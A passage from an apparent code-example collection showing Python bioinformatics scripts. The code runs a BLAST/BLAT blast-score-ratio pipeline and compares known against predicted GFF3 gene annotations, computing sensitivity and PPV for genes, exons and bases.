                logging.logPrint("problem encountered with BLAST database")
                sys.exit()
            blast_against_self_tblastn("blastp", gene_path, gene_path, "tmp_blast.out", processors, filter)
            subprocess.check_call("sort -u -k 1,1 tmp_blast.out > self_blast.out", shell=True)
            ref_scores=parse_self_blast(open("self_blast.out", "U"))
            subprocess.check_call("rm tmp_blast.out self_blast.out", shell=True)
            logging.logPrint("starting BLAST")
            blast_against_each_genome_tblastn(dir_path, processors, gene_path, filter)
        elif gene_path.endswith(".fasta"):
            if "tblastn" == blast:
                logging.logPrint("using tblastn")
                translate_genes(gene_path)
                try:
                    subprocess.check_call("makeblastdb -in %s -dbtype nucl > /dev/null 2>&1" % gene_path, shell=True)
                except:
                    logging.logPrint("problem encountered with BLAST database")
                    sys.exit()
                blast_against_self_tblastn("tblastn", gene_path, "genes.pep", "tmp_blast.out", processors, filter)
                subprocess.check_call("sort -u -k 1,1 tmp_blast.out > self_blast.out", shell=True)
                ref_scores=parse_self_blast(open("self_blast.out", "U"))
                subprocess.check_call("rm tmp_blast.out self_blast.out", shell=True)
                logging.logPrint("starting BLAST")
                blast_against_each_genome_tblastn(dir_path, processors, "genes.pep", filter)
                os.system("cp genes.pep %s" % start_dir)
            elif "blastn" == blast:
                logging.logPrint("using blastn")
                try:
                    subprocess.check_call("makeblastdb -in %s -dbtype nucl > /dev/null 2>&1" % gene_path, shell=True)
                except:
                    logging.logPrint("Database not formatted correctly...exiting")
                    sys.exit()
                try:
                    blast_against_self_blastn("blastn", gene_path, gene_path, "tmp_blast.out", filter, processors)
                except:
                    print "problem with blastn, exiting"
                    sys.exit()
                subprocess.check_call("sort -u -k 1,1 tmp_blast.out > self_blast.out", shell=True)
                os.system("cp self_blast.out tmp.out")
                ref_scores=parse_self_blast(open("self_blast.out", "U"))
                subprocess.check_call("rm tmp_blast.out self_blast.out", shell=True)
                logging.logPrint("starting BLAST")
                try:
                    blast_against_each_genome_blastn(dir_path, processors, filter, gene_path)
                except:
                    print "problem with blastn, exiting"
                    sys.exit()
            elif "blat" == blast:
                logging.logPrint("using blat")
                blat_against_self(gene_path, gene_path, "tmp_blast.out", processors)
                subprocess.check_call("sort -u -k 1,1 tmp_blast.out > self_blast.out", shell=True)
                ref_scores=parse_self_blast(open("self_blast.out", "U"))
                subprocess.check_call("rm tmp_blast.out self_blast.out", shell=True)
                logging.logPrint("starting BLAT")
                blat_against_each_genome(dir_path,gene_path,processors)
            else:
                pass
        else:
            print "input file format not supported"
            sys.exit()
    find_dups_dev(ref_scores, length, max_plog, min_hlog, clusters, processors)
    if blast=="blat":
        logging.logPrint("BLAT done")
    else:
        logging.logPrint("BLAST done")
    parse_blast_report("false")
    get_unique_lines()
    curr_dir=os.getcwd()
    table_files = glob.glob(os.path.join(curr_dir, "*.filtered.unique"))
    files_and_temp_names = [(str(idx), os.path.join(curr_dir, f))
                            for idx, f in enumerate(table_files)]
    names=[]
    table_list = []
    nr_sorted=sorted(clusters)
    centroid_list = []
    centroid_list.append(" ")
    for x in nr_sorted:
        centroid_list.append(x)
    table_list.append(centroid_list)
    logging.logPrint("starting matrix building")
    new_names,new_table = new_loop(files_and_temp_names, processors, clusters, debug)
    new_table_list = table_list+new_table
    logging.logPrint("matrix built")
    open("ref.list", "a").write("\n")
    for x in nr_sorted:
        open("ref.list", "a").write("%s\n" % x)
    names_out = open("names.txt", "w")
    names_redux = [val for subl in new_names for val in subl]
    for x in names_redux: print >> names_out, "".join(x)
    names_out.close()
    create_bsr_matrix_dev(new_table_list)
    divide_values("bsr_matrix", ref_scores)
    subprocess.check_call("paste ref.list BSR_matrix_values.txt > %s/bsr_matrix_values.txt" % start_dir, shell=True)
    if "T" in f_plog:
        filter_paralogs("%s/bsr_matrix_values.txt" % start_dir, "paralog_ids.txt")
        os.system("cp bsr_matrix_values_filtered.txt %s" % start_dir)
    else:
        pass
    try:
        subprocess.check_call("cp dup_matrix.txt names.txt consensus.pep consensus.fasta duplicate_ids.txt paralog_ids.txt %s" % ap, shell=True, stderr=open(os.devnull, 'w'))
    except:
        sys.exc_clear()
    """new code to rename files according to a prefix"""
    import datetime
    timestamp = datetime.datetime.now()
    rename = str(timestamp.year), str(timestamp.month), str(timestamp.day), str(timestamp.hour), str(timestamp.minute), str(timestamp.second)
    os.chdir("%s" % ap)
    if "NULL" in prefix:
        os.system("mv dup_matrix.txt %s_dup_matrix.txt" % "".join(rename))
        os.system("mv names.txt %s_names.txt" % "".join(rename))
        os.system("mv duplicate_ids.txt %s_duplicate_ids.txt" % "".join(rename))
        os.system("mv paralog_ids.txt %s_paralog_ids.txt" % "".join(rename))
        os.system("mv bsr_matrix_values.txt %s_bsr_matrix.txt" % "".join(rename))
        if os.path.isfile("consensus.fasta"):
            os.system("mv consensus.fasta %s_consensus.fasta" % "".join(rename))
        if os.path.isfile("consensus.pep"):
            os.system("mv consensus.pep %s_consensus.pep" % "".join(rename))
    else:
        os.system("mv dup_matrix.txt %s_dup_matrix.txt" % prefix)
        os.system("mv names.txt %s_names.txt" % prefix)
        os.system("mv duplicate_ids.txt %s_duplicate_ids.txt" % prefix)
        os.system("mv paralog_ids.txt %s_paralog_ids.txt" % prefix)
        os.system("mv bsr_matrix_values.txt %s_bsr_matrix.txt" % prefix)
        if os.path.isfile("consensus.fasta"):
            os.system("mv consensus.fasta %s_consensus.fasta" % prefix)
        if os.path.isfile("consensus.pep"):
            os.system("mv consensus.pep %s_consensus.pep" % prefix)
    if "NULL" in prefix:
        outfile = open("%s_run_parameters.txt" % "".join(rename), "w")
    else:
        outfile = open("%s_run_parameters.txt" % prefix, "w")
    print >> outfile, "-d %s \\" % directory
    print >> outfile, "-i %s \\" % id
    print >> outfile, "-f %s \\" % filter
    print >> outfile, "-p %s \\" % processors
    print >> outfile, "-g %s \\" % genes
    print >> outfile, "-c %s \\" % cluster_method
    print >> outfile, "-b %s \\" % blast
    print >> outfile, "-l %s \\" % length
    print >> outfile, "-m %s \\" % max_plog
    print >> outfile, "-n %s \\" % min_hlog
    print >> outfile, "-t %s \\" % f_plog
    print >> outfile, "-k %s \\" % keep
    print >> outfile, "-s %s \\" % filter_peps
    print >> outfile, "-e %s \\" % filter_scaffolds
    print >> outfile, "-x %s \\" % prefix
    print >> outfile, "-z %s" % debug
    print >> outfile, "temp data stored here if kept: %s" % fastadir
    outfile.close()
    logging.logPrint("all Done")
    if "T" == keep:
        pass
    else:
        os.system("rm -rf %s" % fastadir)
    os.chdir("%s" % ap)

Example 155

Project: biocode Source File: compare_gene_structures.py
def process_files(args):
    (assemblies_1, features_1) = biocodegff.get_gff3_features(args.annotation_1)
    (assemblies_2, features_2) = biocodegff.get_gff3_features(args.annotation_2)


    a_exons = []                                    ## Holds only unique exons from the known annotation, since the same exon can appear multiple times in a GFF file.
    p_exons = []                                    ## Same, for the predicted annotation

    a_gene = []
    p_gene = []

    a_mrna = []
    p_mrna = []

    exon_pred_all = set()
    gene_true = set()
    mrna_true = set()



    chr = []

    a_cds = []
    p_cds = []

    a_cd = []
    p_cd = []

    true_pred_file = args.output_dir + '/true_predicted_genes.txt'
    true_file = open(true_pred_file,'w')
    true_file.write("Known\tPredicted\n")
    
    for asm_id in assemblies_1:                                                                                     ## Iterate through each chromosome from the known ref annotation        
        assembly_1 = assemblies_1[asm_id]
        assembly_2 = assemblies_2.get(asm_id,-1)                                                                    ## Find that chromosome in the predicted gff file
        genes_1 = assembly_1.genes()                                                                                ## All genes from known annotation
        anno_exons = set()

        for gene_1 in sorted(genes_1) :                                                                                     ## Add unique gene, mRNA, and exon features from the known annotation to get each known feature's total count
            gene_1_loc = gene_1.location_on(assembly_1)
            cord_a = cordinate(asm_id,gene_1_loc)      ## Use chromosome id+start+stop+strand as a string to determine uniqueness.
            if (cord_a not in a_gene) :
                a_gene.append(cord_a)

            ex_start = []
            ex_stop = []
            for mrna_1 in sorted(gene_1.mRNAs()) :
                mrna_1_loc = mrna_1.location_on(assembly_1)
                cord = cordinate(asm_id,mrna_1_loc)
                if (cord not in a_mrna) :
                    a_mrna.append(cord)
                    
                if (args.feature == "Exon") :
                    feat_1 = mrna_1.exons()
                    
                if (args.feature == "CDS") :
                    feat_1 = mrna_1.CDSs()
                    
                for exon_1 in sorted(feat_1) :
                    exon_1_loc = exon_1.location_on(assembly_1)
                    cord = cordinate(asm_id, exon_1_loc)
                    if (cord not in a_exons) :
                        a_exons.append(cord)
                    anno_exons.add(cord)

                    
                    ex_start.append(exon_1_loc.fmin)
                    ex_stop.append(exon_1_loc.fmax)
                    
            ex_start.sort()
            ex_stop.sort()
            if (len(ex_start) >= 1) :
                cds1 = asm_id + ":" + gene_1.id + ":" + str(ex_start[0]) + ":" + str(ex_stop[-1]) + ":" +  str(gene_1_loc.strand)
                
            else :
                cds1 = asm_id + ":" + gene_1.id + ":" + str(gene_1_loc.fmin) + ":" + str(gene_1_loc.fmax) + ":" +  str(gene_1_loc.strand)
                
                
            if (cord_a not in a_cd) :
                a_cds.append(cds1)
                a_cd.append(cord_a)
             
                    

        if (type(assembly_2) is int) :                     ##    If the chromosome is not found in the predicted file, move to the next chromosome.
            continue
        

        genes_2 = assembly_2.genes()                      ## All genes from predicted annotation.
        chr.append(asm_id)                                ## Append all found chromosome in a list.
        pred_exons = set()

        for gene_2 in sorted(genes_2) :                           ## Add unique gene, mRNA, and exon features from the predicted annotation to get each predicted feature's total count.
            gene_2_loc = gene_2.location_on(assembly_2)
            cord_p = cordinate(asm_id, gene_2_loc)
            if (cord_p not in p_gene) :
                p_gene.append(cord_p)

            ex_start = []
            ex_stop = []
            
            for mrna_2 in sorted(gene_2.mRNAs()) :
                mrna_2_loc = mrna_2.location_on(assembly_2)
                cord = cordinate(asm_id, mrna_2_loc)
                if (cord not in p_mrna) :
                    p_mrna.append(cord)

                if (args.feature == "Exon") :
                    feat_2 = mrna_2.exons()
                    
                if (args.feature == "CDS") :
                    feat_2 = mrna_2.CDSs()
                    
                for exon_2 in sorted(feat_2) :
                    exon_2_loc = exon_2.location_on(assembly_2)
                    cord = cordinate(asm_id ,exon_2_loc)
                    pred_exons.add(cord)
                    if (cord not in p_exons) :
                        p_exons.append(cord)
                        
                    ex_start.append(exon_2_loc.fmin)
                    ex_stop.append(exon_2_loc.fmax)
                    
            ex_start.sort()
            ex_stop.sort()
            
            if (len(ex_start) >= 1) :   
                cds2 = asm_id  + ":" + gene_2.id + ":" + str(ex_start[0]) + ":" + str(ex_stop[-1]) + ":" + str(gene_2_loc.strand)
                
            else :
                cds2 = asm_id + ":" + gene_2.id + ":" + str(gene_2_loc.fmin) + ":" + str(gene_2_loc.fmax) + ":" +  str(gene_2_loc.strand)
                

            if (cord_p not in p_cd) :
                p_cds.append(cds2)
                p_cd.append(cord_p)

                    
        exon_pred_all.update(pred_exons.intersection(anno_exons)) # true exons
        
        
        for gene_2 in sorted(genes_2) :                                         ## From the predicted features, determine the true ones. Iterate through each predicted gene, sorted by coordinate
            gene_2_loc = gene_2.location_on(assembly_2)
            cord_g = cordinate(asm_id, gene_2_loc)
            
            if (cord_g in gene_true) :                                          ## To prevent duplication, check if the feature already exists in the set of truly predicted genes.
                continue
            
            ex_mrna2 = set()
            			
        
            for gene_1 in sorted(genes_1) :
                ex_mrna1 = set()
                gene_1_loc = gene_1.location_on(assembly_1)
                if (gene_1_loc.strand != gene_2_loc.strand) :
                    continue
                if (gene_2.overlaps_with(gene_1)) :
                    
                    for mrna_2 in sorted(gene_2.mRNAs()) :
                        if (args.feature == "Exon") :
                            feat_2 = mrna_2.exons()
                        if (args.feature == "CDS") :
                            feat_2 = mrna_2.CDSs()
                            
                        for exon_2 in sorted(feat_2) :
                            exon_2_loc = exon_2.location_on(assembly_2)
                            cord2 = cordinate(asm_id , exon_2_loc)
                            ex_mrna2.add(cord2)
                            
                    for mrna_1 in sorted(gene_1.mRNAs()) :
                        if (args.feature == "Exon") :
                            feat_1 = mrna_1.exons()
                    
                        if (args.feature == "CDS") :
                            feat_1 = mrna_1.CDSs()
                        
                        for exon_1 in sorted(feat_1) :
                            exon_1_loc = exon_1.location_on(assembly_1)
                            cord1 = cordinate(asm_id, exon_1_loc)
                            ex_mrna1.add(cord1)
                    
                    ex_union = ex_mrna1.union(ex_mrna2)
                    if (len(ex_union) ==  len(ex_mrna1) and len(ex_union) == len(ex_mrna2)) :
                        gene_true.add(cord_g)
                        true_file.write(gene_1.id+"\t"+gene_2.id+"\n")
                        break
          
    for asm_id in assemblies_2:                                                  ## Iterate through each chromosome from the predicted annotation
        if asm_id not in chr :
            assembly_2 = assemblies_2.get(asm_id,-1)                             ## Find that chromosome in the predicted gff file which is not found in known annotation
            genes_2 = assembly_2.genes()                                         ## Add  genes, mrna, exon features from predicted annotation to total predicted feature set.
            
            for gene_2 in sorted(genes_2) :
                gene_2_loc = gene_2.location_on(assembly_2)
                cord_p = cordinate(asm_id ,gene_2_loc)
                if (cord_p not in p_gene) :
                    p_gene.append(cord_p)

                ex_start = []
                ex_stop = []
                
                for mrna_2 in sorted(gene_2.mRNAs()) :
                    mrna_2_loc = mrna_2.location_on(assembly_2)
                    cord = cordinate(asm_id , mrna_2_loc)
                    if (cord not in p_mrna) :
                        p_mrna.append(cord)

                    if (args.feature == "Exon") :
                        feat_2 = mrna_2.exons()
                    if (args.feature == "CDS") :
                        feat_2 = mrna_2.CDSs()
                        
                    for exon_2 in sorted(feat_2) :
                        exon_2_loc = exon_2.location_on(assembly_2)
                        cord = cordinate(asm_id ,exon_2_loc)
                        if (cord not in p_exons) :
                            p_exons.append(cord)
                            
                
                        ex_start.append(exon_2_loc.fmin)
                        ex_stop.append(exon_2_loc.fmax)

                ex_start.sort()
                ex_stop.sort()
                if (len(ex_start) >= 1) :
                    cds2 = asm_id  + ":" + gene_2.id + ":" + str(ex_start[0]) + ":" + str(ex_stop[-1]) + ":" + str(gene_2_loc.strand)
                    
                else :
                    cds2 = asm_id + ":" + gene_2.id + ":" + str(gene_2_loc.fmin) + ":" + str(gene_2_loc.fmax) + ":" +  str(gene_2_loc.strand)
                    

                if (cord_p not in p_cd) :
                    p_cds.append(cds2)
                    p_cd.append(cord_p)
                            

    

    #Calculate SN/SP for bases 

    (a_base_val, p_base_val, true_base) = base_comparison(p_exons,a_exons)

    base_sn = (true_base/a_base_val) * 100                                 
    base_sp = (true_base/p_base_val) * 100
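    # SN (sensitivity) = true positives / known features; the 'sp' variables
    # actually hold precision (PPV) = true positives / predicted features,
    # matching the PPV column printed below. Both are scaled to percentages.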


    #Calculate SN/SP for exons 
    annotated_exon = len(a_exons)
    predicted_exon = len(p_exons)
    true_pred_exon = len(exon_pred_all)
    
    exon_sn = (true_pred_exon/annotated_exon) * 100                                 
    exon_sp = (true_pred_exon/predicted_exon) * 100

    #Calculate SN/SP for genes 

    annotated_gene = len(a_gene)
    predicted_gene = len(p_gene)
    true_pred_gene = len(gene_true)

    
    gene_sn = (true_pred_gene/annotated_gene) * 100                                 
    gene_sp = (true_pred_gene/predicted_gene) * 100
    print("Feature\tKnown\tPredicted\tTrue_Predicted\tSN\tPPV\n")
    print("Gene\t"+str(annotated_gene)+"\t"+str(predicted_gene)+"\t"+str(true_pred_gene)+"\t"+str(gene_sn)+"\t"+str(gene_sp))
    print(args.feature+"\t"+str(annotated_exon)+"\t"+str(predicted_exon)+"\t"+str(true_pred_exon)+"\t"+str(exon_sn)+"\t"+str(exon_sp))
    print("Base\t"+str(a_base_val)+"\t"+str(p_base_val)+"\t"+str(true_base)+"\t"+str(base_sn)+"\t"+str(base_sp))
    
    out_file = args.output_dir + '/summary.txt'
    if not (os.path.exists(args.output_dir)) :
        sys.exit("Directory does not exist.")
    fout = open(out_file,'w')

    fout.write("Feature\tKnown\tPredicted\tTrue_Predicted\tSN\tPPV\n")
    fout.write("Gene\t"+str(annotated_gene)+"\t"+str(predicted_gene)+"\t"+str(true_pred_gene)+"\t"+str(gene_sn)+"\t"+str(gene_sp)+"\n")
    fout.write(args.feature+"\t"+str(annotated_exon)+"\t"+str(predicted_exon)+"\t"+str(true_pred_exon)+"\t"+str(exon_sn)+"\t"+str(exon_sp)+"\n")
    fout.write("Base\t"+str(a_base_val)+"\t"+str(p_base_val)+"\t"+str(true_base)+"\t"+str(base_sn)+"\t"+str(base_sp)+"\n\n")


    arr_pred = compare_cds(p_cds,a_cds,"pred")
    arr_known = compare_cds(a_cds,p_cds,"known")
    arr_pred_same = compare_cds(p_cds,p_cds,"pred_same")
    
    new_gene = arr_pred[2]
    gene_merge = arr_pred[3]
    gene_found = arr_pred[0]
    gene_opp = arr_pred[1]       
    gene_missing = arr_known[2]
    gene = arr_known[0]
    gene_opp_known = arr_known[1]
    gene_split = arr_known[3]
    gene_pred_overlap_opp = arr_pred_same[1]


            
    print ("1. No. of known gene : ",len(a_cds))
    print ("2. No. of predicted gene : ",len(p_cds))
    print ("3. No. of predicted gene overlapping  0 known gene (new gene): ",new_gene)
    print ("4. No. of predicted gene overlapping > 1 known gene (gene merge) : ",gene_merge)
    print ("5. No. of predicted gene overlaping 1 known gene : ",gene_found)
    print ("6. No. of predicted gene overlapping >= 1 known gene in opp strand : ",gene_opp)
    print ("7. No. of predicted gene overlapping  1 known gene (exact intron/exon boundaries) : ",true_pred_gene)
    print ("8. No. of predicted gene overlapping >= 1 predicted gene in opp strand : ",gene_pred_overlap_opp)
    
    print ("9. No. of known gene overlapping  0 predicted gene (gene missing): ",gene_missing)
    print ("10. No. of known gene overlapping > 1 predicted gene(gene split) : ",gene_split)
    print ("11. No. of known gene overlaping 1 predicted gene : ",gene)
    print ("12. No. of known gene overlapping >= 1 predicted gene in opp strand : ",gene_opp_known)

    
    out_file = args.output_dir + '/final_stats.txt'
    if not (os.path.exists(args.output_dir)) :
        sys.exit("Directory does not exist.")
    fout = open(out_file,'w')
    
    fout.write ("1. No. of known gene : " + str(len(a_cds)) + "\n")
    fout.write ("2. No. of predicted gene : " + str(len(p_cds)) + "\n")
    fout.write ("3. No. of predicted gene overlapping  0 known gene (new gene): " + str(new_gene) + "\n")
    fout.write ("4. No. of predicted gene overlapping > 1 known gene (gene merge) : " + str(gene_merge) + "\n")
    fout.write ("5. No. of predicted gene overlaping 1 known gene : " + str(gene_found) + "\n")
    fout.write ("6. No. of predicted gene overlapping >= 1 known gene in opp strand : " + str(gene_opp) + "\n")
    fout.write ("7. No. of predicted gene overlapping  1 known gene (exact intron/exon boundary) : " + str(true_pred_gene) + "\n")
    fout.write ("8. No. of predicted gene overlapping >= 1  predicted gene in opp strand : " + str(gene_pred_overlap_opp) + "\n")
    fout.write ("9. No. of known gene overlapping  0 predicted gene (gene missing): " + str(gene_missing) + "\n")
    fout.write ("10. No. of known gene overlapping > 1 predicted gene (gene_split): " + str(gene_split) + "\n")
    fout.write ("11. No. of known gene overlaping 1 predicted gene : " + str(gene) + "\n")
    fout.write ("12. No. of known gene overlapping >= 1 predicted gene in opp strand : " + str(gene_opp_known) + "\n")



    true_pred_file = args.output_dir + '/true_pred.txt'
    fout_true = open(true_pred_file,'w')
    for true_gene in gene_true :
        fout_true.write(true_gene+"\n")
    


    #Clean up
    delete_file = ['exon_1.bed','exon_2.bed','exon_1_merged.bed','exon_2_merged.bed','exon_1_2_intersect.bed']
    for f in delete_file :
        cmd = "rm " + args.output_dir + "/" + f
        os.system(cmd)
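    # A shell-free alternative (sketch, not in the original) would avoid spawning a
    # process per file and handle unusual filenames safely:
    #     os.remove(os.path.join(args.output_dir, f))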

Example 156

Project: biocode Source File: structural_comparison_gff3.py
def process_files(args):
    (assemblies_1, features_1) = biocodegff.get_gff3_features(args.annotation_1)
    (assemblies_2, features_2) = biocodegff.get_gff3_features(args.annotation_2)


    a_exons = []                                    ## Holds only unique exons from the known annotation, since the same exon can appear multiple times in a gff file.
    p_exons = []                                    ## Same, for the predicted annotation

    a_gene = []
    p_gene = []

    a_mrna = []
    p_mrna = []

    exon_pred_all = set()
    gene_true = set()
    mrna_true = set()



    chr = []

    a_cds = []                                   
    p_cds = []                                   
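    # Note: the 'not in' membership tests on these lists below are O(n) per lookup;
    # parallel sets would make the de-duplication checks O(1) for large annotations.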

    a_cd = []
    p_cd = []

    true_pred_file = args.output_dir + '/true_predicted_genes.txt'
    true_file = open(true_pred_file,'w')
    true_file.write("Known\tPredicted\n")
    
    for asm_id in assemblies_1:                                                                                     ## Iterate through each chromosome from the known ref annotation        
        assembly_1 = assemblies_1[asm_id]
        assembly_2 = assemblies_2.get(asm_id,-1)                                                                    ## Find that chromosome in the predicted gff file
        genes_1 = assembly_1.genes()                                                                                ## All genes from known annotation
        anno_exons = set()

        for gene_1 in sorted(genes_1) :                                                                                     ## Add unique gene, mRNA and exon features from the known annotation to get total counts for each known feature type
            gene_1_loc = gene_1.location_on(assembly_1)
            cord_a = cordinate(asm_id,gene_1_loc)      ## Use chromosome id+start+stop+strand as a string to determine uniqueness.
            if (cord_a not in a_gene) :
                a_gene.append(cord_a)

            ex_start = []
            ex_stop = []
            for mrna_1 in sorted(gene_1.mRNAs()) :
                mrna_1_loc = mrna_1.location_on(assembly_1)
                cord = cordinate(asm_id,mrna_1_loc)
                if (cord not in a_mrna) :
                    a_mrna.append(cord)
                    
                if (args.feature == "Exon") :
                    feat_1 = mrna_1.exons()
                    
                if (args.feature == "CDS") :
                    feat_1 = mrna_1.CDSs()
                    
                for exon_1 in sorted(feat_1) :
                    exon_1_loc = exon_1.location_on(assembly_1)
                    cord = cordinate(asm_id, exon_1_loc)
                    if (cord not in a_exons) :
                        a_exons.append(cord)
                    anno_exons.add(cord)

                    
                    ex_start.append(exon_1_loc.fmin)
                    ex_stop.append(exon_1_loc.fmax)
                    
            ex_start.sort()
            ex_stop.sort()
            if (len(ex_start) >= 1) :
                cds1 = asm_id + ":" + gene_1.id + ":" + str(ex_start[0]) + ":" + str(ex_stop[-1]) + ":" +  str(gene_1_loc.strand)
                
            else :
                cds1 = asm_id + ":" + gene_1.id + ":" + str(gene_1_loc.fmin) + ":" + str(gene_1_loc.fmax) + ":" +  str(gene_1_loc.strand)
                
                
            if (cord_a not in a_cd) :
                a_cds.append(cds1)
                a_cd.append(cord_a)
             
                    

        if (type(assembly_2) is int) :                     ## If the chromosome is not found in the predicted file, move to the next chromosome.
            continue
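        # (assemblies_2.get(asm_id, -1) above returns the int sentinel -1 when this
        # known chromosome has no counterpart in the predicted GFF.)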
        

        genes_2 = assembly_2.genes()                      ## All genes from predicted annotation.
        chr.append(asm_id)                                ## Append all found chromosome in a list.
        pred_exons = set()

        for gene_2 in sorted(genes_2) :                           ## Add unique gene, mRNA and exon features from the predicted annotation to get total counts for each predicted feature type.
            gene_2_loc = gene_2.location_on(assembly_2)
            cord_p = cordinate(asm_id, gene_2_loc)
            if (cord_p not in p_gene) :
                p_gene.append(cord_p)

            ex_start = []
            ex_stop = []
            
            for mrna_2 in sorted(gene_2.mRNAs()) :
                mrna_2_loc = mrna_2.location_on(assembly_2)
                cord = cordinate(asm_id, mrna_2_loc)
                if (cord not in p_mrna) :
                    p_mrna.append(cord)

                if (args.feature == "Exon") :
                    feat_2 = mrna_2.exons()
                    
                if (args.feature == "CDS") :
                    feat_2 = mrna_2.CDSs()
                    
                for exon_2 in sorted(feat_2) :
                    exon_2_loc = exon_2.location_on(assembly_2)
                    cord = cordinate(asm_id ,exon_2_loc)
                    pred_exons.add(cord)
                    if (cord not in p_exons) :
                        p_exons.append(cord)
                        
                    ex_start.append(exon_2_loc.fmin)
                    ex_stop.append(exon_2_loc.fmax)
                    
            ex_start.sort()
            ex_stop.sort()
            
            if (len(ex_start) >= 1) :   
                cds2 = asm_id  + ":" + gene_2.id + ":" + str(ex_start[0]) + ":" + str(ex_stop[-1]) + ":" + str(gene_2_loc.strand)
                
            else :
                cds2 = asm_id + ":" + gene_2.id + ":" + str(gene_2_loc.fmin) + ":" + str(gene_2_loc.fmax) + ":" +  str(gene_2_loc.strand)
                

            if (cord_p not in p_cd) :
                p_cds.append(cds2)
                p_cd.append(cord_p)

                    
        exon_pred_all.update(pred_exons.intersection(anno_exons)) # true exons
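        # Coordinates present in BOTH the predicted and the known annotation are the
        # true-positive exons/CDSs for this chromosome, accumulated in exon_pred_all.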
        
        
        for gene_2 in sorted(genes_2) :                                         ## From the predicted features, determine the true ones. Iterate through each predicted gene sorted by coordinate.
            gene_2_loc = gene_2.location_on(assembly_2)
            cord_g = cordinate(asm_id, gene_2_loc)
            
            if (cord_g in gene_true) :                                          ## To prevent duplication, skip the feature if it already exists in the set of truly predicted genes.
                continue
            ex_mrna1 = set()
            ex_mrna2 = set()
			
        
            for gene_1 in sorted(genes_1) :
                gene_1_loc = gene_1.location_on(assembly_1)
                if (gene_1_loc.strand != gene_2_loc.strand) :
                    continue
                if (gene_2.overlaps_with(gene_1)) :
                    for mrna_2 in sorted(gene_2.mRNAs()) :
                        if (args.feature == "Exon") :
                            feat_2 = mrna_2.exons()
                        if (args.feature == "CDS") :
                            feat_2 = mrna_2.CDSs()
                            
                        for exon_2 in sorted(feat_2) :
                            exon_2_loc = exon_2.location_on(assembly_2)
                            cord2 = cordinate(asm_id , exon_2_loc)
                            ex_mrna2.add(cord2)
                            
                    for mrna_1 in sorted(gene_1.mRNAs()) :
                        if (args.feature == "Exon") :
                            feat_1 = mrna_1.exons()
                    
                        if (args.feature == "CDS") :
                            feat_1 = mrna_1.CDSs()
                        
                        for exon_1 in sorted(feat_1) :
                            exon_1_loc = exon_1.location_on(assembly_1)
                            cord1 = cordinate(asm_id, exon_1_loc)
                            ex_mrna1.add(cord1)
                    
                    ex_union = ex_mrna1.union(ex_mrna2)
                    if (len(ex_union) ==  len(ex_mrna1) and len(ex_union) == len(ex_mrna2)) :
                        gene_true.add(cord_g)
                        true_file.write(gene_1.id+"\t"+gene_2.id+"\n")
                        break
          
    for asm_id in assemblies_2:                                                  ## Iterate through each chromosome from the predicted annotation
        if asm_id not in chr :
            assembly_2 = assemblies_2.get(asm_id,-1)                             ## Find chromosomes in the predicted gff file that are absent from the known annotation
            genes_2 = assembly_2.genes()                                         ## Add gene, mRNA and exon features from the predicted annotation to the total predicted feature set.
            
            for gene_2 in sorted(genes_2) :
                gene_2_loc = gene_2.location_on(assembly_2)
                cord_p = cordinate(asm_id ,gene_2_loc)
                if (cord_p not in p_gene) :
                    p_gene.append(cord_p)

                ex_start = []
                ex_stop = []
                
                for mrna_2 in sorted(gene_2.mRNAs()) :
                    mrna_2_loc = mrna_2.location_on(assembly_2)
                    cord = cordinate(asm_id , mrna_2_loc)
                    if (cord not in p_mrna) :
                        p_mrna.append(cord)

                    if (args.feature == "Exon") :
                        feat_2 = mrna_2.exons()
                    if (args.feature == "CDS") :
                        feat_2 = mrna_2.CDSs()
                        
                    for exon_2 in sorted(feat_2) :
                        exon_2_loc = exon_2.location_on(assembly_2)
                        cord = cordinate(asm_id ,exon_2_loc)
                        if (cord not in p_exons) :
                            p_exons.append(cord)
                            
                
                        ex_start.append(exon_2_loc.fmin)
                        ex_stop.append(exon_2_loc.fmax)

                ex_start.sort()
                ex_stop.sort()
                if (len(ex_start) >= 1) :
                    cds2 = asm_id  + ":" + gene_2.id + ":" + str(ex_start[0]) + ":" + str(ex_stop[-1]) + ":" + str(gene_2_loc.strand)
                    
                else :
                    cds2 = asm_id + ":" + gene_2.id + ":" + str(gene_2_loc.fmin) + ":" + str(gene_2_loc.fmax) + ":" +  str(gene_2_loc.strand)
                    

                if (cord_p not in p_cd) :
                    p_cds.append(cds2)
                    p_cd.append(cord_p)
                            

    

    #Calculate SN/SP for bases 

    (a_base_val, p_base_val, true_base) = base_comparison(p_exons,a_exons)

    base_sn = (true_base/a_base_val) * 100                                 
    base_sp = (true_base/p_base_val) * 100


    #Calculate SN/SP for exons 
    annotated_exon = len(a_exons)
    predicted_exon = len(p_exons)
    true_pred_exon = len(exon_pred_all)
    
    exon_sn = (true_pred_exon/annotated_exon) * 100                                 
    exon_sp = (true_pred_exon/predicted_exon) * 100

    #Calculate SN/SP for genes 

    annotated_gene = len(a_gene)
    predicted_gene = len(p_gene)
    true_pred_gene = len(gene_true)

    
    gene_sn = (true_pred_gene/annotated_gene) * 100                                 
    gene_sp = (true_pred_gene/predicted_gene) * 100
    print("Feature\tKnown\tPredicted\tTrue_Predicted\tSN\tPPV\n")
    print("Gene\t"+str(annotated_gene)+"\t"+str(predicted_gene)+"\t"+str(true_pred_gene)+"\t"+str(gene_sn)+"\t"+str(gene_sp))
    print(args.feature+"\t"+str(annotated_exon)+"\t"+str(predicted_exon)+"\t"+str(true_pred_exon)+"\t"+str(exon_sn)+"\t"+str(exon_sp))
    print("Base\t"+str(a_base_val)+"\t"+str(p_base_val)+"\t"+str(true_base)+"\t"+str(base_sn)+"\t"+str(base_sp))
    
    out_file = args.output_dir + '/summary.txt'
    if not (os.path.exists(args.output_dir)) :
        sys.exit("Directory does not exist.")
    fout = open(out_file,'w')

    fout.write("Feature\tKnown\tPredicted\tTrue_Predicted\tSN\tPPV\n")
    fout.write("Gene\t"+str(annotated_gene)+"\t"+str(predicted_gene)+"\t"+str(true_pred_gene)+"\t"+str(gene_sn)+"\t"+str(gene_sp)+"\n")
    fout.write(args.feature+"\t"+str(annotated_exon)+"\t"+str(predicted_exon)+"\t"+str(true_pred_exon)+"\t"+str(exon_sn)+"\t"+str(exon_sp)+"\n")
    fout.write("Base\t"+str(a_base_val)+"\t"+str(p_base_val)+"\t"+str(true_base)+"\t"+str(base_sn)+"\t"+str(base_sp)+"\n\n")


    arr_pred = compare_cds(p_cds,a_cds,"pred")
    arr_known = compare_cds(a_cds,p_cds,"known")
    arr_pred_same = compare_cds(p_cds,p_cds,"pred_same")
    
    new_gene = arr_pred[2]
    gene_merge = arr_pred[3]
    gene_found = arr_pred[0]
    gene_opp = arr_pred[1]       
